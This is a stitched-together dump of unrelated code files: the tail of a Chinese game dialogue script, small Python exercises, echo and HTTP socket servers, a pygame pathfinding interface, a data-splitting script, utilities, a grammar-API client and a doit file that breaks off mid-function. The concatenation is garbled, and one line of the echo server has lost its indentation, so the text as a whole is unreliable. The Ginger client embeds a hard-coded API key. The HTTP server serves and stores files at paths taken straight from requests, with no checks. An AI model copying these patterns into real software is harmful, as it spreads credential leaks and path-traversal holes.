"#000F是这样啊……\x02",
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#010F是什么时候\x01",
"发觉我们是父亲的孩子的呢?\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x108,
(
"#070F第一次见面时,\x01",
"看见艾丝蒂尔拿着棒子,\x01",
"我就开始有些注意了……\x02\x03",
"在询问了雾香之后我才确信。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#000F真是的,怎么能这样……\x02\x03",
"之前连一个字\x01",
"也没有和我们提起过……\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x108,
(
"#070F哈哈,大人的信上\x01",
"写着『不要太溺爱他们』呢。\x02\x03",
"让我最低限度地帮助你们,\x01",
"平时守护着就可以了……\x02\x03",
"话又说回来,看来你们俩已经\x01",
"完成了一件不小的事情对吧?\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#000F啊,嗯……\x02\x03",
"我说约修亚,\x01",
"现在说出来就没问题了吧?\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#010F嗯,既然如此,\x01",
"我就一一道来吧。\x02\x03",
"我们刚刚办完的事情\x01",
"要说起来是一个很长的故事呢。\x02",
)
)
CloseMessageWindow()
FadeToDark(300, 0, 100)
AnonymousTalk(
(
scpstr(SCPSTR_CODE_COLOR, 0x5),
"艾丝蒂尔她们把博士的委托,\x01",
"见到艾莉茜雅女王……\x02",
)
)
CloseMessageWindow()
AnonymousTalk(
(
scpstr(SCPSTR_CODE_COLOR, 0x5),
"还有接受了女王的委托,要将被捉走的\x01",
"科洛蒂娅公主解救出来的事情说了出来。\x02",
)
)
CloseMessageWindow()
OP_56(0x0)
FadeToBright(300, 0)
ChrTalk(
0x108,
(
"#070F原来如此啊……\x02\x03",
"听了晚宴上那些话后,\x01",
"我就感觉充满了火药味……\x02\x03",
"好的,为了完成这个委托,\x01",
"也让我助你们一臂之力吧。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
"#000F哎,可以吗?\x02",
)
CloseMessageWindow()
ChrTalk(
0x108,
(
"#070F啊,这是报答卡西乌斯大人\x01",
"恩情的绝好机会呢。\x02\x03",
"请务必让我帮忙。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#000F我、我们俩也请你\x01",
"多多关照了~\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x102,
"#010F再次请您多多关照。\x02",
)
CloseMessageWindow()
ChrTalk(
0x108,
"#070F哦,彼此彼此啦。\x02",
)
CloseMessageWindow()
FadeToDark(2000, 0, -1)
OP_0D()
OP_A2(0x3FA)
NewScene("ED6_DT01/C4300 ._SN", 100, 0, 0)
IdleLoop()
Return()
# Function_14_3737 end
SaveToFile()
Try(main)
|
#import sys
#input = sys.stdin.readline
def main():
    """Read N strings (after an "N L" header line), sort them
    lexicographically and print their concatenation.

    L describes the string length in the input format but is not
    needed to produce the output.
    """
    N, _L = map(int, input().split())
    S = [input() for _ in range(N)]
    S.sort()
    # (the unused scratch list V = [1]*N from the original was removed)
    print("".join(S))
if __name__ == '__main__':
    main()
|
import threading
import time
from concurrent.futures import ThreadPoolExecutor
from socket import socket, AF_INET, SOCK_STREAM
def client(sock, addr):
    """Echo loop for a single connection.

    Mirrors every received chunk back to the peer until the peer closes
    its sending side (recv returns b''), then closes the socket.
    """
    print('Got connection from', addr)
    # iter() with a b'' sentinel replaces the manual while/break loop.
    for chunk in iter(lambda: sock.recv(1024), b''):
        print(str(chunk))
        sock.sendall(chunk)
    print('Client closed connection')
    sock.close()
def server(addr):
    """Accept connections on *addr* forever, serving each via a thread pool.

    Never returns; each accepted connection is handed to client().
    """
    listener = socket(AF_INET, SOCK_STREAM)
    listener.bind(addr)
    listener.listen(5)
    pool = ThreadPoolExecutor(10)
    while True:
        conn, peer = listener.accept()
        pool.submit(client, conn, peer)
def main():
    # Start the echo server on all interfaces, port 3333 (blocks forever).
    server(('', 3333))
if __name__ == '__main__':
main() |
class School:
    """Base school record: a student's name and address."""

    def admission(self, name, adress):
        """Store name/adress on the instance and echo them to stdout.

        The historical 'adress' spelling is kept — it is part of the
        caller-visible attribute/parameter interface.
        """
        self.name = name
        self.adress = adress
        print(name, adress)
class College(School):
    """School specialisation that additionally records an admission number."""

    def admission(self, name, adress, admnno):
        """Store name/adress/admnno and echo them to stdout.

        NOTE(review): this override widens the signature relative to
        School.admission (3 args vs 2) — callers must know which
        concrete type they hold.
        """
        self.name = name
        self.adress = adress
        self.admnno = admnno
        print(name, adress, admnno)
# Demo: register one student and print name, address and admission number.
cc=College()
cc.admission('aliya','mumbai',23)
|
# Objects Are Like Import
class Mymodule(object):
    """Toy class used to illustrate instantiation ("mini-import")."""

    def __init__(self):
        # Instance attribute set on every object built from this blueprint.
        self.mehmet = "Hahahahahha"

    def apple(self):
        """Print a fixed greeting."""
        print("I'm apples")
# If a class is like a ”mini-module,” then there has to be a concept similar to import but for classes. That
# concept is called ”instantiate”, which is just a fancy, obnoxious, overly smart way to say ”create.” When
# you instantiate a class what you get is called an object.
# You instantiate (create) a class by calling the class like it’s a function, like this:
# Instantiate the class (build one object from the blueprint) and use it.
thing = Mymodule()
thing.apple()
print(thing.mehmet)
# That’s the basics of how Python does this ”mini-import” when you call a class like a function. Remember
# that this is not giving you the class but instead is using the class as a blueprint for building a copy of that
# type of thing.
|
import pygame as pg
# Colour palette (RGB) for grid cells: start ("P") / end ("K") squares,
# grid lines, obstacles, the found path, the working colour and the
# currently visited cell.
boje = { "bojaPKvadrata": (50, 168, 82),
         "bojaKKvadrata": (168, 64, 50),
         "bojaGrida": (0, 0, 0),
         "bojaPrepreke": (0, 0, 0),
         "bojaPuta": (212, 203, 30),
         "radnaBoja": (66, 147, 245),
         "bojaTrenutna": (245, 47, 50)}
# GUI button descriptors: id, font size, label, text colour, fill colour and
# whether the button spans the full panel width ("veliki").
# ids 0-3 = search algorithms, 100/101 = start/reset,
# 200-203 = terrain brushes (label suffix is the terrain's movement cost).
dugmiciZaGui = [{"id": 0, "fontVelicina": 40, "text": "BFS", "boja": (0, 0, 0), "backgroundBoja": (67, 183, 250), "veliki": False},
                {"id": 1, "fontVelicina": 40, "text": "DFS", "boja": (0, 0, 0), "backgroundBoja": (67, 183, 250), "veliki": False},
                {"id": 2, "fontVelicina": 40, "text": "Dijkstra", "boja": (0, 0, 0), "backgroundBoja": (67, 183, 250), "veliki": False},
                {"id": 3, "fontVelicina": 40, "text": "A*", "boja": (0, 0, 0), "backgroundBoja": (67, 183, 250), "veliki": False},
                {"id": 100, "fontVelicina": 52, "text": "Start", "boja": (0, 0, 0), "backgroundBoja": (67, 183, 250), "veliki": True},
                {"id": 101, "fontVelicina": 52, "text": "Reset", "boja": (0, 0, 0), "backgroundBoja": (67, 183, 250), "veliki": True},
                {"id": 200, "fontVelicina": 32, "text": "Voda 2", "boja": (0, 0, 0), "backgroundBoja": (52, 210, 235), "veliki": False},
                {"id": 201, "fontVelicina": 32, "text": "Planine 4", "boja": (0, 0, 0), "backgroundBoja": (133, 101, 13), "veliki": False},
                {"id": 202, "fontVelicina": 32, "text": "Brda 3", "boja": (0, 0, 0), "backgroundBoja": (227, 176, 34), "veliki": False},
                {"id": 203, "fontVelicina": 32, "text": "Led 0.3", "boja": (0, 0, 0), "backgroundBoja": (114, 242, 214), "veliki": False},
                ]
def main(sirina, visina, GUIdodatak, velicinaKvadrata):
    # Initialise pygame, draw the empty grid plus the GUI buttons and
    # return everything the caller's event loop needs.
    # sirina/visina: window width/height in px; GUIdodatak: width of the
    # side panel holding the buttons; velicinaKvadrata: cell size in px.
    brojKvadrataUOsi = visina // velicinaKvadrata
    pg.init()
    ekran = pg.display.set_mode((sirina, visina))
    ekran.fill(pg.Color("white"))
    kvadrati = nacrtajGrid(ekran, brojKvadrataUOsi, velicinaKvadrata)
    dugmiciZaCrtanjeArr = dobijDugmiceZaCrtanje(GUIdodatak, visina, dugmiciZaGui, "Roboto-Regular.ttf", 20, 20)
    nacrtajDugmice(ekran, dugmiciZaCrtanjeArr)
    pozicijeDugmica = []
    # Pair each drawn rect with the matching id from dugmiciZaGui
    # (both lists are in the same order).
    for i in range(len(dugmiciZaCrtanjeArr)):
        pozicijeDugmica.append({"pozicija": dugmiciZaCrtanjeArr[i][1].copy(), "id": dugmiciZaGui[i]["id"]})
    return (ekran, kvadrati, pozicijeDugmica)
def nacrtajDugmice(ekran, dugmiciZaCrtanjeArr):
    """Draw every button: filled background, 1px border, centred label.

    ekran: target pygame surface.
    dugmiciZaCrtanjeArr: list of (text_surface, rect) pairs, in the same
    order as the module-level dugmiciZaGui descriptors.
    """
    for i, (tekst, okvir) in enumerate(dugmiciZaCrtanjeArr):
        # enumerate() instead of list.index(): index() is O(n) per button
        # and returns the FIRST equal element, so two identical-looking
        # buttons would both take the first one's colours.
        internalRect = tekst.get_rect()
        internalRect.center = (okvir.centerx, okvir.centery)
        pg.draw.rect(ekran, dugmiciZaGui[i]["backgroundBoja"], okvir)
        pg.draw.rect(ekran, dugmiciZaGui[i]["boja"], okvir, 1)
        ekran.blit(tekst, internalRect)
def nacrtajGrid(ekran, brojKvadrataUOsi, velicinaKvadrata):
    """Draw an NxN grid of outlined cells; return their rects column-major."""
    kvadrati = []
    for kolona in range(brojKvadrataUOsi):
        for red in range(brojKvadrataUOsi):
            celija = pg.Rect(kolona * velicinaKvadrata, red * velicinaKvadrata,
                             velicinaKvadrata, velicinaKvadrata)
            kvadrati.append(celija)
            pg.draw.rect(ekran, boje["bojaGrida"], celija, 1)
    return kvadrati
def obojKvadrat(kvadrati, ekran):
    # Factory: returns a painter closure that colours the cell under the
    # mouse according to the active brush, while recording which cells
    # were painted with what role in pozicijeObojenihKvadrata.
    pozicijeObojenihKvadrata = {
        "pocetak":None,
        "kraj": None,
        "blokirane" : [],
        "voda": [],
        "planine": [],
        "brda": [],
        "led": [],
    }
    # Closure state: the first click paints the start cell, the second the
    # end cell, every later click uses the brush id.
    nacrtanPocetak = False
    nacrtanKraj = False
    def obojKvadratInternal(brojCetkice):
        nonlocal nacrtanKraj, nacrtanPocetak, pozicijeObojenihKvadrata
        posMisa = pg.mouse.get_pos()
        for kvadrat in kvadrati:
            if kvadrat.collidepoint(posMisa):
                if nacrtanPocetak == False:
                    bojaKvadrata = boje["bojaPKvadrata"]
                    pozicijeObojenihKvadrata["pocetak"] = kvadrat
                    nacrtanPocetak = True
                elif nacrtanKraj == False:
                    bojaKvadrata = boje["bojaKKvadrata"]
                    pozicijeObojenihKvadrata["kraj"] = kvadrat
                    nacrtanKraj = True
                else:
                    # Brush ids 200-203 are the terrain buttons; -1 is the
                    # plain obstacle brush.
                    if brojCetkice == 200:
                        bojaKvadrata = findInDugmiciArr(200)["backgroundBoja"]
                        pozicijeObojenihKvadrata["voda"].append(kvadrat)
                    if brojCetkice == 201:
                        bojaKvadrata = findInDugmiciArr(201)["backgroundBoja"]
                        pozicijeObojenihKvadrata["planine"].append(kvadrat)
                    if brojCetkice == 202:
                        bojaKvadrata = findInDugmiciArr(202)["backgroundBoja"]
                        pozicijeObojenihKvadrata["brda"].append(kvadrat)
                    # NOTE: the elif below pairs with the 203-test only, so
                    # -1 is reached when none of 200-202 matched either.
                    if brojCetkice == 203:
                        bojaKvadrata = findInDugmiciArr(203)["backgroundBoja"]
                        pozicijeObojenihKvadrata["led"].append(kvadrat)
                    elif brojCetkice == -1:
                        bojaKvadrata = boje["bojaPrepreke"]
                        pozicijeObojenihKvadrata["blokirane"].append(kvadrat)
                    # NOTE(review): an unknown brush id would leave
                    # bojaKvadrata unassigned and raise UnboundLocalError
                    # here — callers appear to pass only 200-203 or -1.
                    pg.draw.rect(ekran, bojaKvadrata, kvadrat, 0)
        return pozicijeObojenihKvadrata
    return obojKvadratInternal
def dobijDugmiceZaCrtanje(GUIdodatak, visina, dugmiciList, fontIme, topPadding, leftPadding):
    # Render every button descriptor into a (text_surface, rect) pair,
    # laying the buttons out in the side panel via odrediMestoDugmeta.
    dugmiciRectArr = []
    textRect = pg.Rect((0, 0, 0, 0))
    odrediMestoDugmetaFunc = odrediMestoDugmeta(GUIdodatak, visina, topPadding, leftPadding)
    for i in range (0, len(dugmiciList)):
        temp = dugmiciList[i]
        textSurface = dobijDugme(fontIme, temp["fontVelicina"], temp["text"], temp["boja"], temp["backgroundBoja"])
        mestoDugmeta = odrediMestoDugmetaFunc(temp["veliki"])
        textRect.width = mestoDugmeta[1][0]
        textRect.height = mestoDugmeta[1][1]
        textRect.topleft = mestoDugmeta[0]
        # .copy() because textRect itself is reused on every iteration.
        dugmiciRectArr.append((textSurface, textRect.copy()))
    return dugmiciRectArr
def odrediMestoDugmeta(GUIdodatak, visina, topPadding, leftPadding, visinaVelikog = 85, visinaMalog = 60):
    # Factory: returns a layout closure that hands out the next button slot
    # in the side panel. "Large" buttons take a full row; "small" buttons
    # are placed two per row (left column first, then right).
    ostaloVisine = visina   # vertical space still available in the panel
    ostaloSirine = GUIdodatak   # horizontal space left in the current row
    def odrediMestoDugmetaInternal(veliki):
        nonlocal ostaloVisine, ostaloSirine
        ###
        sirinaMalog = GUIdodatak // 2 - leftPadding * 2
        ###
        (x, y) = (None, None)
        (sirina, visinaInternal) = (None, None)
        if veliki == True:
            if visina - ostaloVisine + visinaVelikog < 0:
                raise NameError("nema mesta u visina za crtanje velikog dugmeta")
            (sirina, visinaInternal) = (GUIdodatak - leftPadding * 2, visinaVelikog)
            # The panel starts at x == visina (the grid is a visina-wide square).
            (x, y) = (visina + leftPadding, visina - ostaloVisine + topPadding)
            ostaloVisine -= (visinaVelikog + topPadding)
            #ostaloSirine -= (GUIdodatak - leftPadding * 2)
            ostaloSirine = GUIdodatak
        else:
            if visina - ostaloVisine + visinaMalog < 0:
                raise NameError("nema mesta u visini za crtanje malog dugmeta")
            (sirina, visinaInternal) = (GUIdodatak // 2 - leftPadding * 2, visinaMalog)
            # Left column when a fresh row starts, right column otherwise.
            (x, y) = (visina + leftPadding if ostaloSirine != (GUIdodatak // 2) else visina + ostaloSirine + leftPadding, visina - ostaloVisine + topPadding)
            ###
            #ostaloSirine -= GUIdodatak // 2
            # Toggle between half-row and full-row; move down a row only
            # after the right column of a pair is filled.
            ostaloSirine = GUIdodatak if ostaloSirine == (GUIdodatak // 2) else (GUIdodatak // 2)
            ostaloVisine = (ostaloVisine - (visinaMalog + topPadding)) if ostaloSirine == GUIdodatak else ostaloVisine
            ###
        return ((x, y),(sirina, visinaInternal))
    return odrediMestoDugmetaInternal
def dobijDugme(fontIme, fontVelicina, text, boja, backgroundBoja):
    """Render *text* with the given font file/size/colour; return the surface.

    backgroundBoja is accepted for call-site symmetry but unused here —
    the button background is painted separately by the drawing code.
    """
    font = pg.font.Font(fontIme, fontVelicina)
    return font.render(text, True, boja)
def obojiAktivnoDugme(ekran):
    # Factory: returns a closure that highlights the newly selected button
    # and repaints the previously selected one back to the default colours.
    indexObojenogDumeta = -1
    oldDugme = None      # descriptor of the previously highlighted button
    oldPozicija = None   # its rect on screen
    def obojiAktivnoDugmeInternal(dugmeID, dugmePozicija):
        nonlocal indexObojenogDumeta, oldDugme, oldPozicija
        def find(lst, key, value):
            # Linear search: index of the first dict whose key matches, or -1.
            for i, dic in enumerate(lst):
                if dic[key] == value:
                    return i
            return -1
        if oldDugme != None:
            # Restore the previous button to the default blue background.
            textSurface = dobijDugme("Roboto-Regular.ttf", oldDugme["fontVelicina"], oldDugme["text"], oldDugme["boja"], oldDugme["backgroundBoja"])
            internalRect = textSurface.get_rect()
            internalRect.center = (oldPozicija.centerx, oldPozicija.centery)
            pg.draw.rect(ekran, (67, 183, 250), oldPozicija)
            pg.draw.rect(ekran, (0,0,0), oldPozicija, 1)
            ekran.blit(textSurface, internalRect)
        indexObojenogDumeta = find(dugmiciZaGui, "id", dugmeID)
        dugme = dugmiciZaGui[indexObojenogDumeta]
        # Repaint the newly selected button with the highlight colour.
        textSurface = dobijDugme("Roboto-Regular.ttf", dugme["fontVelicina"], dugme["text"], dugme["boja"], dugme["backgroundBoja"])
        internalRect = textSurface.get_rect()
        internalRect.center = (dugmePozicija.centerx, dugmePozicija.centery)
        pg.draw.rect(ekran, (242, 75, 41), dugmePozicija)
        pg.draw.rect(ekran, (0,0,0), dugmePozicija, 1)
        ekran.blit(textSurface, internalRect)
        oldDugme = dugme
        oldPozicija = dugmePozicija
    return obojiAktivnoDugmeInternal
def findInDugmiciArr(id):
    """Return the button descriptor in dugmiciZaGui with the given id.

    Raises NameError for unknown ids, matching the module's error style.
    """
    opis = next((el for el in dugmiciZaGui if el["id"] == id), None)
    if opis is None:
        raise NameError("pogresan id dugmeta")
    return opis
|
def fun():
    # Demonstrates that a function without an explicit return yields None.
    print('hello')
    # return 1            # would end the function, returning one object
    # return 1,2,[23,4]   # multiple values get packed into a tuple (1, 2, [23, 4])
    # print(1)            # code after a return would never execute
# Without a return statement Python implicitly returns None.
print(fun())
|
#!/usr/bin/env python
# coding: utf-8
"""
From a file containing Decompressed relations, this script generates
a set of files containing SPLITS percentage of the dataset. Thus, a
file containing 100 frames, this script creates a folder `10/` containing
a file with the same name of the input file, but containing only 10% of
the total of frames. Thus, the file contains 10 frames. The same is valid
for `20/`, `30/`, `50/` and `70/`. The last containing 70% of the frames.
"""
import logging
logger = logging.getLogger(__name__)
logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)
import sys
import os
import argparse
from os.path import join, dirname, isdir
import random
import filehandler as fh
SPLITS = [10, 30, 50, 70]
def save_file(fileoutput, sampling, idx2rels):
    """ Save the selected sampling frames in the output file.

    Frames are written in ascending original-frame order and renumbered
    consecutively from 0 in the output.

    Parameters:
    -----------
    fileoutput: string
        path where the content is saved
    sampling: array
        list containing the selected indexes to be saved
    idx2rels: dict
        dictionary containing the id of the frame as key and
        the relationships (subject, relation, object) as value
    """
    logger.info('Saving splitted observations at: {}'.format(fileoutput))
    # 'with' guarantees the file is closed even if a lookup below fails.
    with open(fileoutput, 'w') as fout:
        fout.write('Frame\tSubject\tRelation\tObject\n')
        # enumerate() renumbers the frames, replacing a manual counter
        # that shadowed the builtin `id`.
        for new_id, idfr in enumerate(sorted(sampling)):
            for s, r, o in idx2rels[idfr]:
                fout.write('{}\t{}\t{}\t{}\n'.format(new_id, s, r, o))
def split_file(path, folders):
    """ Create the set of splits for a single file.

    Parameters:
    -----------
    path: string
        path to the input Decompressed file
    folders: dict
        dictionary containing the id of the split as key
        and the path to the folder where the split is
        saved as value.
    """
    filerels = fh.DecompressedFile(path)
    idx2rels = {}
    with filerels as frels:
        fname_in = frels.filename
        for idfr, arr in frels.iterate_frames():
            idx2rels[idfr] = arr
    for split in sorted(folders):
        # Number of frames that make up `split` percent of the file.
        perc = int(len(idx2rels)*split/100)
        logger.info('Creating split with {}%: {}*0.{} = {} observations'.format(split, len(idx2rels), split, perc))
        indexes = list(idx2rels.keys())
        # random.sample draws WITHOUT replacement; the previous
        # random.choices could select the same frame twice, producing
        # splits with duplicated frames and fewer distinct observations
        # than the requested percentage.
        sampling = random.sample(indexes, k=perc)
        fileoutput = join(folders[split], fname_in)
        save_file(fileoutput, sampling, idx2rels)
def split_from_folder(folder_input, output=None):
    """ Read a folder containing Decompressed files and
    create a split dataset for each file.

    Parameters:
    -----------
    folder_input: string
        path to the folder containing Decompressed files
    output: string (optional)
        path to the folder where the files containing splits
        are saved. Defaults to <folder_input>/splits.tmp.
    """
    if not output:
        output = join(folder_input, 'splits.tmp')
    output = fh.mkdir_from_file(output)
    # create folders
    # One sub-folder per split percentage (10/, 30/, 50/, 70/).
    folders = {}
    for split in SPLITS:
        folder_out = join(output, str(split))
        folder_out = fh.mkdir_from_file(folder_out)
        folders[split] = folder_out
    files = fh.FolderHandler(folder_input)
    for path in files:
        logger.info('Processing file: %s' % path)
        split_file(path, folders)
    logger.info('Finished successfully!')
if __name__ == '__main__':
    # CLI: positional input folder, optional -o/--output destination folder.
    parser = argparse.ArgumentParser()
    parser.add_argument('input', metavar='input_folder', help='Plain text file')
    parser.add_argument('-o', '--output', help='Plain text file', default=None)
    args = parser.parse_args()
    split_from_folder(args.input, args.output)
|
# Copyright (c) 2011, James Hanlon, All rights reserved
# This software is freely distributable under a derivative of the
# University of Illinois/NCSA Open Source License posted in
# LICENSE.txt and at <http://github.xcore.com/>
import sys
import re
import os
import subprocess
from math import log, ceil
from error import Error
def read_file(filename, read_lines=False):
    """
    Read a file and return its contents as a string, or as a list of
    lines when *read_lines* is True.

    Raises Error on I/O problems; any other failure is re-raised as a
    generic Exception, matching the module's error-handling style.
    """
    try:
        # 'with' guarantees the handle is closed even if reading fails;
        # the previous manual open/close leaked the handle on error.
        with open(filename, 'r') as f:
            if read_lines:
                return f.readlines()
            else:
                return f.read()
    except IOError as err:
        raise Error('Error reading input {}: {}'
                    .format(filename, err.strerror))
    except:
        raise Exception('Unexpected error: {}'
                        .format(sys.exc_info()[0]))
def write_file(filename, s):
    """
    Write string *s* to *filename*; return True on success.

    On IOError the problem is reported on stderr and Error is raised;
    any other failure is re-raised as a generic Exception.
    """
    try:
        # 'with' guarantees the handle is closed even if the write fails.
        with open(filename, 'w') as f:
            f.write(s)
        return True
    except IOError as err:
        sys.stderr.write('writing output {}: {}'
                         .format(filename, err.strerror))
        raise Error()
    except:
        raise Exception('Unexpected error: {}'
                        .format(sys.exc_info()[0]))
def call(args, v=False):
    """
    Try to execute a shell command and return its stdout as a string.

    With v=True the command line is echoed first. On a non-zero exit the
    command and its output go to stderr and Error is raised; any other
    failure is re-raised as a generic Exception.
    """
    try:
        if v:
            print(' '.join(args))
        raw = subprocess.check_output(args, stderr=subprocess.STDOUT)
        return raw.decode("utf-8").replace("\\n", "\n")
    except subprocess.CalledProcessError as e:
        details = e.output.decode('utf-8').replace("\\n", "\n")
        sys.stderr.write('executing command:\n\n{}\n\nOuput:\n\n{}'
                         .format(' '.join(e.cmd), details))
        raise Error()
    except:
        raise Exception('Unexpected error: {}'.format(sys.exc_info()[0]))
def remove_file(filename):
    """
    Remove a regular file if it exists; missing paths and directories
    are silently left alone.
    """
    if not os.path.isfile(filename):
        return
    os.remove(filename)
def rename_file(filename, newname):
    """
    Rename a regular file to *newname* if it exists; otherwise do nothing.
    """
    if not os.path.isfile(filename):
        return
    os.rename(filename, newname)
def camel_to_under(s):
    """
    Convert a camel-case string to use underscores (snake_case).

    Handles acronym runs correctly: 'HTTPServer' -> 'http_server'. The
    previous single-pass regex formatted its unmatched groups as the
    literal string 'None' whenever the acronym alternative matched
    (e.g. 'HTTPServer' became 'htnone_nonerver').
    """
    # Pass 1: separate any character from a following capitalised word,
    # which also splits a trailing acronym from the next word.
    s = re.sub(r'(.)([A-Z][a-z]+)', r'\1_\2', s)
    # Pass 2: separate a lowercase letter or digit from a following capital.
    return re.sub(r'([a-z0-9])([A-Z])', r'\1_\2', s).lower()
def indexed_dict(elements):
    """
    Return a dictionary mapping each item to its index in *elements*.

    If an item repeats, the last occurrence wins — same as building
    dict() from the (item, index) pair list.
    """
    return {item: pos for pos, item in enumerate(elements)}
def vhdr(verbose, msg, end='\n'):
    """
    Verbose header: print *msg* framed by dashed rules, verbose mode only.
    """
    if not verbose:
        return
    rule = '-' * len(str(msg)) + '\n'
    sys.stdout.write(rule)
    sys.stdout.write(msg + end)
    sys.stdout.write(rule)
    sys.stdout.flush()
def next_power_of_2(n):
    """
    Return the smallest power of two >= n (n must be a positive integer).

    Uses integer bit arithmetic: the previous 2**ceil(log(n, 2)) relied
    on floating-point log and can round the wrong way for large n.
    """
    if n < 1:
        raise ValueError('n must be >= 1, got {}'.format(n))
    return 1 << (n - 1).bit_length()
def vmsg(verbose, msg, end='\n'):
    """
    Verbose message: print *msg* (followed by *end*) in verbose mode only.
    """
    if not verbose:
        return
    sys.stdout.write(msg + end)
    sys.stdout.flush()
def debug(display, msg):
    """Print *msg* when *display* is truthy; otherwise stay silent."""
    if not display:
        return
    print(msg)
|
#!/usr/local/bin/python
# -*- coding: utf-8 -*-
import requests
import json
import sys
import os
class GingerSummary(object):
    """Applies a set of Ginger correction results to the original text."""
    def __init__(self, original, results):
        super(GingerSummary, self).__init__()
        self.original = original
        # Sort by start offset with a key function: sorted(..., cmp=...)
        # and the cmp() builtin are Python 2 only and raise TypeError /
        # NameError on Python 3 (which the rest of this file targets).
        self.results = sorted(results, key=lambda r: r.from_)
        self.gingered = None  # lazily built corrected text
    def process(self):
        """Return the corrected sentence, computing it on first use."""
        if not self.gingered:
            self._ginger()
        return self.gingered
    def show_detail(self):
        """Print every individual correction result."""
        for r in self.results:
            print(r)
    def _ginger(self):
        """Splice each top suggestion into the text, tracking length drift."""
        gingered = self.original
        offset = 0
        for r in self.results:
            suggest = r.suggestions[0]
            gingered = '{0}{1}{2}'.format(gingered[:r.from_+offset], suggest, gingered[r.to+1+offset:])
            # offset accumulates how much the text has grown or shrunk so
            # later (higher-index) replacements land at the right spot.
            offset += len(suggest) - (r.to - r.from_ + 1)
        self.gingered = gingered
class GingerResult(object):
    """A single correction suggestion parsed from the Ginger API payload."""
    def __init__(self):
        super(GingerResult, self).__init__()
    @classmethod
    def create_from_json(cls, json):
        """Build a result from one LightGingerTheTextResult entry."""
        result = GingerResult()
        result.from_ = json['From']
        result.to = json['To']
        result.suggestions = [entry['Text'] for entry in json['Suggestions']]
        result.should_replace = bool(json['ShouldReplace'])
        result.confidence = json['Confidence']
        return result
    def __str__(self):
        return 'from: {0}, to: {1}, suggestions: [{2}], should_replace: {3}, confidence: {4}'.format(
            self.from_, self.to, ', '.join(self.suggestions), self.should_replace, self.confidence)
class GingerClient(object):
    """Ginger Client: fetches grammar corrections for one sentence (network-bound)."""
    base_url = 'http://services.gingersoftware.com/Ginger/correct/json/GingerTheText'
    # NOTE(review): API key hard-coded in source — consider moving it to
    # configuration or an environment variable.
    api_key = '6ae0c3a0-afdc-4532-a810-82ded0054236'
    def __init__(self, sentence):
        super(GingerClient, self).__init__()
        self.sentence = sentence
    def ginger(self):
        # Query the API and return the fully corrected sentence.
        self._initialize()
        return self.summary.process()
    def show_detail(self):
        # Query the API and print each correction individually.
        self._initialize()
        self.summary.show_detail()
    def _initialize(self):
        # Fetch and parse the API response into a GingerSummary.
        # NOTE(review): called from each public method, so ginger()
        # followed by show_detail() performs two HTTP requests.
        params = {'apiKey':GingerClient.api_key, 'text':self.sentence, 'lang':'US', 'clientVersion':'2.0'}
        response = requests.get(GingerClient.base_url, params=params)
        results = json.loads(response.text)['LightGingerTheTextResult']
        ginger_results = [GingerResult.create_from_json(x) for x in results]
        self.summary = GingerSummary(self.sentence, ginger_results)
class RephraseClient(object):
    """RephraseClient: fetches alternative phrasings for one sentence (network-bound)."""
    base_url = 'http://ro.gingersoftware.com/rephrase/rephrase'
    def __init__(self, sentence):
        super(RephraseClient, self).__init__()
        self.sentence = sentence
    def rephrase(self):
        # Return the list of rephrased sentence strings from the API.
        response = requests.get(RephraseClient.base_url, params={'s': self.sentence})
        results = json.loads(response.text)['Sentences']
        texts = [x['Sentence'] for x in results]
        return texts
|
import socket
import sys
import threading
# Define socket host and port
SERVER_HOST = '127.0.0.1'
SERVER_PORT = 8000
# Create socket
# SO_REUSEADDR lets the server rebind the port right after a restart.
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server_socket.bind((SERVER_HOST, SERVER_PORT))
server_socket.listen(1)
print('Listening on port %s ...' % SERVER_PORT)
def Socket_Thread(sock, addr):
    """Serve one HTTP client on *sock*: GET returns a file, PUT stores one.

    Bug fixes versus the original handler:
    - operates on the *sock* parameter instead of the module-global
      `client_connection`, which raced between threads whenever two
      clients were connected at once;
    - no longer closes the global listening `server_socket` on exit,
      which previously killed the whole server after the first request.
    """
    try:
        print("IN TRY")
        request = sock.recv(1024).decode()
        file_request = request.split()[1]
        # "/" maps to index.html; otherwise drop the leading slash.
        file_request = "index.html" if file_request == "/" else file_request[1:]
        if request.split()[0] == "GET":
            # 'with' closes the file even if the read fails.
            with open(file_request, "r") as f:
                outputdata = f.read()
            response = ("HTTP/1.1 200 OK\n"
                        "Server: Python 3.8\n"
                        "Content-Type: text/html; charset=utf-8\r\n\n")
            print("SENDING RESPONSE")
            sock.send(response.encode())
            print("response sent")
            # One sendall replaces the original byte-at-a-time send loop.
            sock.sendall(outputdata.encode())
            sock.send("\r\n".encode())
            sock.close()
        elif request.split()[0] == "PUT":
            filename = request.split()[1].replace("/", "")
            print("SAVING: ", filename)
            with open(filename, 'wb') as f:
                sock.sendall(str.encode("200 OK File Created"))
                while True:
                    print('receiving data...')
                    data = sock.recv(1024)
                    if not data:
                        break
                    # write data to a file
                    f.write(data)
    except IOError:
        # Send response message for file not found
        response = ("HTTP/1.1 404 Not Found\n"
                    "Server: Python 3.8\n"
                    "Content-Type: text/html; charset=utf-8\r\n\n")
        sock.send(response.encode())
        sock.send("\r\n".encode())
        sock.close()
while True:
    # Wait for client connections
    # Serve each accepted connection on its own thread.
    client_connection, client_address = server_socket.accept()
    threading.Thread(target=Socket_Thread, args=(client_connection, client_address)).start()
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function, unicode_literals
import os
import sys
# Run the 'hello' task when doit is invoked without a task name.
DOIT_CONFIG = {'default_tasks': ['hello']}
# Make the project sources importable for tasks run from the repo root.
sys.path.append(os.path.join('.', 'src'))
def is_windows():
    """Return True when the interpreter runs on a Windows platform."""
    return sys.platform[:3] == 'win'
def task_hello():
    """hello"""
    # doit invokes each python action with the task's targets.
    def python_hello(targets):
        print("Hi")
    task = {'actions': [python_hello]}
    return task
def task_pack_gui():
    # Bundle the GUI application with PyInstaller from its spec file.
